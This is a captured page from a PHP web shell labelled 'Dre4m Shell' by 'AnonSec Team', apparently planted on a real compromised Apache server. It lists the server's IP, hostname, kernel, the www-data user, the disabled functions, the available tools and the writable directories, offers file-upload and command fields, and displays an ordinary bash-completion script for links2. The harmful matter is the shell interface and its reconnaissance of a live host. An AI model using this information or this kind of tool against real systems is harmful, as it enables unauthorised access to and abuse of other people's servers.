Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.224.57.86
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/bash-completion/completions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/bash-completion/completions/links2
# bash completion for links                                -*- shell-script -*-

_links()
{
    local cur prev words cword
    _init_completion -n : || return

    case $prev in
        -html-t-text-color | -html-t-link-color)
            COMPREPLY=($(compgen -W '{0..15}' -- "$cur"))
            return
            ;;
        -http.fake-firefox | -html-[gt]-ignore-document-color)
            COMPREPLY=($(compgen -W '0 1' -- "$cur"))
            return
            ;;
        --help | -help | -mode | -display | -source | -dump | -width | -max-connections | \
            -max-connections-to-host | -retries | -receive-timeout | \
            -unrestartable-receive-timeout | -*-size | -*-proxy | \
            -append-text-to-dns-lookups | -ssl.client-cert-passwd | -http.fake-* | \
            -http.extra-header | -ftp.anonymous-passwd | -*-color | -*-gamma | \
            -bfu-aspect | -html-image-scale | -html-margin)
            return
            ;;
        -lookup)
            _known_hosts_real -- "$cur"
            return
            ;;
        -driver)
            local drivers=$("$1" -driver foo 2>&1 |
                command sed -ne '$!d' -e '/^[a-z0-9, ]\{1,\}$/s/,/ /gp')
            [[ $drivers ]] || drivers='x svgalib fb directfb pmshell atheos'
            COMPREPLY=($(compgen -W "$drivers" -- "$cur"))
            return
            ;;
        -codepage | -bookmarks-codepage | -http-assume-codepage)
            _xfunc iconv _iconv_charsets
            return
            ;;
        -download-dir)
            _filedir -d
            return
            ;;
        -bind-address)
            _ip_addresses
            return
            ;;
        -bind-address-ipv6)
            _ip_addresses -6
            __ltrim_colon_completions "$cur"
            return
            ;;
        -async-dns | -download-utime | -aggressive-cache | -only-proxies | \
            -http-bugs.* | -http.do-not-track | -ftp.use-* | -ftp.fast | -ftp.set-iptos | \
            -smb.allow-hyperlinks-to-smb | -save-url-history | -dither-letters | \
            -dither-images | -overwrite-instead-of-scroll | -html-*)
            COMPREPLY=($(compgen -W '0 1' -- "$cur"))
            return
            ;;
        -address-preference | -http.referer)
            COMPREPLY=($(compgen -W '{0..4}' -- "$cur"))
            return
            ;;
        -ssl-certificates | -display-optimize | -gamma-correction)
            COMPREPLY=($(compgen -W '{0..2}' -- "$cur"))
            return
            ;;
        -ssl.client-cert-key)
            _filedir '@(key|pem)'
            return
            ;;
        -ssl.client-cert-crt)
            _filedir '@(c?(e)rt|cer|pem|der)'
            return
            ;;
        -bookmarks-file)
            _filedir html
            return
            ;;
    esac

    if [[ $cur == -* ]]; then
        COMPREPLY=($(compgen -W '$(_parse_help "$1" |
            command grep -vF -- "->")' -- "$cur"))
        return
    fi

    local dir
    for dir in .links .links2; do
        if [[ -r ~/$dir/links.his ]]; then
            COMPREPLY+=($(compgen -W '$(cat ~/$dir/links.his)' -- "$cur"))
            __ltrim_colon_completions "$cur"
        fi
    done
    _filedir '@(htm|html)'

} &&
    complete -F _links links links2

# ex: filetype=sh

Anon7 - 2022
AnonSec Team